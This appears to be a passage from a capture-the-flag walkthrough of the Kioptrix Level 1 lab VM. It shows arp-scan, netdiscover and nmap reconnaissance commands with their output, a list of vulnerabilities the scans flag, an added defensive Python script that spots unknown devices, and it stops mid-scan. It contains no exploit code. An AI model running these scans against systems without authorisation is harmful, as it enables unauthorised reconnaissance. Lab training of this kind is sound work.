01-Kioptix Level-1
Setup
After unpacking the target VM files, open kioptixlevel.vmx
and delete the following lines:
ethernet0.connectionType = "nat"
ethernet0.addressType = "generated"
ethernet0.present = "TRUE"
ethernet0.pciSlotNumber = "32"
ethernet0.generatedAddress = "00:0c:29:23:49:96"
ethernet0.generatedAddressOffset = "0"
Import the virtual machine
Configure the network
Find the target's IP
Method 1
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c9:0e:45, IPv4: 192.168.75.145
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.75.1 00:50:56:c0:00:08 VMware, Inc.
192.168.75.2 00:50:56:f7:5d:e0 VMware, Inc.
192.168.75.147 00:0c:29:0c:9b:0b VMware, Inc.
192.168.75.254 00:50:56:f9:5c:be VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.008 seconds (127.49 hosts/sec). 4 responded
Method 2
┌──(root㉿kali)-[~]
└─# netdiscover -i eth0 -r 192.168.75.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.75.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.75.2 00:50:56:f7:5d:e0 4 240 VMware, Inc.
192.168.75.147 00:0c:29:0c:9b:0b 1 60 VMware, Inc.
192.168.75.254 00:50:56:f9:5c:be 1 60 VMware, Inc.
zsh: suspended netdiscover -i eth0 -r 192.168.75.0/24
Method 3
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -O 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 21:16 CST
Nmap scan report for 192.168.75.147
Host is up (0.00050s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: zMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
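All three methods above answer the same question: which MACs are answering on the lab segment, and which of them are not expected. The script below is an added example, not part of the original write-up; it parses arp-scan output laid out like the capture above (the sample text and the asset inventory are constructed for this example) and reports any responding host whose MAC is not in the inventory, which is the same data a defender uses for rogue-device detection on a segment.

```python
import re
from typing import Dict, List

# Constructed arp-scan -l output modelled on the capture above (tab-separated,
# as arp-scan writes it); this is not the page's own terminal output.
SAMPLE_ARP_SCAN = """Interface: eth0, type: EN10MB, MAC: 00:0c:29:c9:0e:45, IPv4: 192.168.75.145
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.75.1\t00:50:56:c0:00:08\tVMware, Inc.
192.168.75.2\t00:50:56:f7:5d:e0\tVMware, Inc.
192.168.75.147\t00:0c:29:0c:9b:0b\tVMware, Inc.
192.168.75.254\t00:50:56:f9:5c:be\tVMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.008 seconds (127.49 hosts/sec). 4 responded
"""

# Constructed asset inventory keyed by MAC: the devices the segment owner
# expects to see. The hypervisor's own adapters are listed; the target VM is not.
KNOWN_ASSETS: Dict[str, str] = {
    "00:50:56:c0:00:08": "vmware host-only adapter",
    "00:50:56:f7:5d:e0": "vmware nat gateway",
    "00:50:56:f9:5c:be": "vmware dhcp server",
}

# One responding host per line: IPv4, MAC, vendor text (whitespace-tolerant so
# a copy-pasted capture with spaces instead of tabs still parses).
HOST_LINE = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+(.*)$", re.I
)


def parse_arp_scan(text: str) -> List[dict]:
    """Extract the responding hosts from arp-scan output, skipping banner lines."""
    hosts = []
    for line in text.splitlines():
        m = HOST_LINE.match(line.strip())
        if m:
            hosts.append({"ip": m.group(1), "mac": m.group(2).lower(), "vendor": m.group(3).strip()})
    return hosts


def unknown_hosts(hosts: List[dict], inventory: Dict[str, str]) -> List[dict]:
    """Hosts that answered ARP but whose MAC is not in the approved inventory."""
    return [h for h in hosts if h["mac"] not in inventory]


def duplicate_ips(hosts: List[dict]) -> List[str]:
    """IPs claimed by more than one MAC (arp-scan shows these as DUP replies);
    a classic symptom of an address conflict or ARP spoofing."""
    seen: Dict[str, set] = {}
    for h in hosts:
        seen.setdefault(h["ip"], set()).add(h["mac"])
    return sorted(ip for ip, macs in seen.items() if len(macs) > 1)


if __name__ == "__main__":
    found = parse_arp_scan(SAMPLE_ARP_SCAN)
    for h in unknown_hosts(found, KNOWN_ASSETS):
        print(f"unknown device {h['ip']} {h['mac']} ({h['vendor']})")
    for ip in duplicate_ips(found):
        print(f"address conflict on {ip}")
```

Run against a real capture by piping `arp-scan -l` into a file and replacing SAMPLE_ARP_SCAN with its contents; keying the inventory on MAC rather than IP is deliberate, since DHCP leases move but a VM's generated MAC stays with it.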
Host discovery
IPs found:
192.168.75.147
192.168.75.145
# Discover the target IP address
arp-scan -l
# Port scan
masscan --rate=10000 --port=0-65535 192.168.75.147
# Fingerprinting
nmap 192.168.75.147 -p 22,80,111,139,443,1024 -sV -O --version-all
# Discover the target IP address
nmap -sn 192.168.75.0/24
# Port scan
nmap --min-rate 10000 -p- 192.168.75.147
# Information gathering
nmap -sT -sC -sV -O -p22,80,111,139,443,1024 192.168.75.147
# Vulnerability scan
nmap --script=vuln -p22,80,111,139,443,1024 192.168.75.147
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 14:59 CST
Nmap scan report for 192.168.75.1
Host is up (0.00062s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:5D:E0 (VMware)
Nmap scan report for 192.168.75.147
Host is up (0.00010s latency).
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:EC:92:9B (VMware)
Nmap scan report for 192.168.75.145
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.12 seconds
Comprehensive scan
nmap -sS -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sT -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sU -sV -O -T5 -p 1-65535 192.168.75.147
nmap -sF -sV -O -T5 -p 1-65535 192.168.75.147
-sS: SYN scan, for quickly scanning hosts on the network.
-sT: TCP connect scan, to determine which ports are open.
-sF: FIN scan, another way to determine which ports are open.
-sV: service version detection; tries to determine the version of the service running on each open port.
-O: operating system detection; tries to identify the target host's operating system.
-T5: timing template; T5 is the fastest scan speed.
-p 1-65535: port range to scan, from 1 to 65535.
Results
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:39 CST
Nmap scan report for 192.168.75.147
Host is up (0.00072s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:39 CST
Nmap scan report for 192.168.75.147
Host is up (0.0011s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds
┌──(root㉿kali)-[~]
└─# nmap -sU -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:44 CST
Warning: 192.168.75.147 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.75.147
Host is up (0.00047s latency).
Skipping host 192.168.75.147 due to host timeout
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 900.62 seconds
┌──(root㉿kali)-[~]
└─# nmap -sF -sV -O -T5 -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 17:43 CST
Nmap scan report for 192.168.75.147
Host is up (0.00066s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.54 seconds
nmap --min-rate 10000 -p- 192.168.128.134    (minimum packet rate of 10000)
nmap -sF -sV -O -T5 -sC -p 1-65535 192.168.75.147
┌──(root㉿kali)-[~/work]
└─# nmap -sF -sV -O -T5 -sC -p 1-65535 192.168.75.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 21:09 CST
Nmap scan report for 192.168.75.147
Host is up (0.00067s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1026/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2024-12-05T14:11:48+00:00; +1h01m50s from scanner time.
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds
┌──(root㉿kali)-[~/work]
└─#
Fingerprinting
nmap 192.168.75.147 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
┌──(root㉿kali)-[~]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:06 CST
Nmap scan report for 192.168.75.147
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1026/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
|_ssl-date: 2024-12-05T13:08:39+00:00; +1h01m50s from scanner time.
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m49s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.20 seconds
Based on the nmap scan results above, here is a detailed explanation of the scan report for the target host 192.168.75.147:
Target host status
- Host status: up (0.00049s latency).
Port and service information
- 22/tcp: open SSH service, OpenSSH 2.9p2, protocol 1.99.
  - SSHv1 is supported.
  - Three host keys are listed.
- 80/tcp: open HTTP service, Apache httpd 1.3.20 on Unix (Red Hat/Linux), with mod_ssl/2.8.4 and OpenSSL/0.9.6b.
  - Page title is "Test Page for the Apache Web Server on Red Hat Linux".
  - The TRACE method is enabled, which may be a security risk.
- 111/tcp: open rpcbind service, version 2.
  - Lists the registered RPC services, including rpcbind and status.
- 139/tcp: open NetBIOS-SSN service provided by Samba smbd, workgroup MYGROUP.
- 443/tcp: open SSL/HTTPS service, Apache/1.3.20 on Unix (Red Hat/Linux), with mod_ssl/2.8.4 and OpenSSL/0.9.6b.
  - Returned a 400 Bad Request error.
  - Reports the SSL certificate details, including the validity period and the supported SSLv2 cipher suites.
- 1024/tcp: open status service, version 1 (RPC #100024).
MAC address and device information
- MAC address: 00:0C:29:0C:9B:0B (VMware).
- Device type: general purpose.
- Operating system: Linux 2.4.X.
- CPE: cpe:/o:linux:linux_kernel:2.4.
- OS details: Linux 2.4.9 - 2.4.18 (likely embedded).
Network distance
- Network distance: 1 hop.
Host script results
- Clock skew: 1h01m49s.
- SMB2 time: SMB2 protocol negotiation failed.
- NBSTAT: NetBIOS name KIOPTRIX, user unknown, MAC address unknown.
Other information
- Warning: OS scan results may be unreliable because at least one open and one closed port could not be found.
- Scan complete: 1 IP address (1 host up) scanned in 23.20 seconds.
Reporting
- Any incorrect scan results can be reported on the Nmap submission page.
This report gives detailed network service and operating system information about the target host, which is useful for security auditing and system administration.
Vulnerability detection with nmap
┌──(root㉿kali)-[~]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -oA namo_ip -script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:22 CST
Nmap scan report for 192.168.75.147
Host is up (0.00027s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_ http://www.cvedetails.com/cve/2014-0224
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://weakdh.org
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://www.securityfocus.com/bid/74733
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
1024/tcp open kdm
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
Nmap done: 1 IP address (1 host up) scanned in 321.25 seconds
┌──(root㉿kali)-[~]
└─#
Based on the nmap scan results above, here is a detailed explanation of the scan report for the target host 192.168.75.147:
Target host status
- Host status: up (0.00027s latency).
Port and service information
- 22/tcp: open SSH service.
- 80/tcp: open HTTP service.
  - Directory enumeration found several potentially interesting paths:
    - /test.php: test page.
    - /icons/: potentially interesting directory with listing.
    - /manual/: potentially interesting directory with listing.
    - /usage/: potentially interesting folder.
  - TRACE: the TRACE method is enabled, which may be a security risk.
  - XSS: no stored or DOM-based cross-site scripting (XSS) vulnerabilities found.
  - CSRF: no cross-site request forgery (CSRF) vulnerabilities found.
- 111/tcp: open rpcbind service.
- 139/tcp: open NetBIOS-SSN service.
- 443/tcp: open HTTPS service.
- 1024/tcp: open kdm service (this scan ran without -sV, so "kdm" is only the default name from nmap's services table; the earlier version scan identified the port as the RPC status service).
Vulnerability information
- SSL/TLS MITM vulnerability (CCS Injection):
  - State: vulnerable.
  - Risk factor: high.
  - Description: OpenSSL does not properly restrict processing of ChangeCipherSpec messages, which allows a man-in-the-middle attacker to trigger use of a zero-length master key and consequently hijack sessions or obtain sensitive information.
  - CVE: CVE-2014-0224.
- SSL POODLE information leak:
  - State: vulnerable.
  - IDs: BID:70574, CVE:CVE-2014-3566.
  - Description: SSL 3.0 uses nondeterministic CBC padding, which makes it easier for a man-in-the-middle attacker to obtain cleartext data via a padding-oracle attack.
  - CVE: CVE-2014-3566.
- TLS DHE_EXPORT cipher suite downgrade MITM (Logjam):
  - State: vulnerable.
  - IDs: BID:74733, CVE:CVE-2015-4000.
  - Description: the TLS protocol has a flaw in handling DHE_EXPORT cipher suites that may allow a man-in-the-middle attacker to downgrade a TLS session to 512-bit export-grade cryptography, making it easier to break the encryption and monitor or tamper with the encrypted stream.
  - CVE: CVE-2015-4000.
SMB vulnerabilities
- SMBv2 vulnerability (CVE-2009-3103):
  - State: vulnerable.
  - Description: an array index error in the SMBv2 protocol implementation allows remote attackers to execute arbitrary code or cause a denial of service (system crash).
  - CVE: CVE-2009-3103.
  - Note: the script's own description names srv2.sys on Windows Vista, Server 2008 and Windows 7, while this host runs Samba on Linux 2.4, so this result should be treated as a likely false positive and verified rather than reported as-is.
Other information
- MAC address: 00:0C:29:0C:9B:0B (VMware).
Scan summary
- Scan complete: 1 IP address (1 host up) scanned in 321.25 seconds.
This report gives detailed network service and operating system information about the target host together with the security vulnerabilities found, which is useful for security auditing and system administration.
┌──(root㉿kali)-[~/work]
└─# nmap 192.168.75.147 -p 22,80,111,139,443,1024 -oA namo_ip -script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 20:30 CST
Nmap scan report for 192.168.75.147
Host is up (0.00086s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test.php: Test page
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.securityfocus.com/bid/74733
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://weakdh.org
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
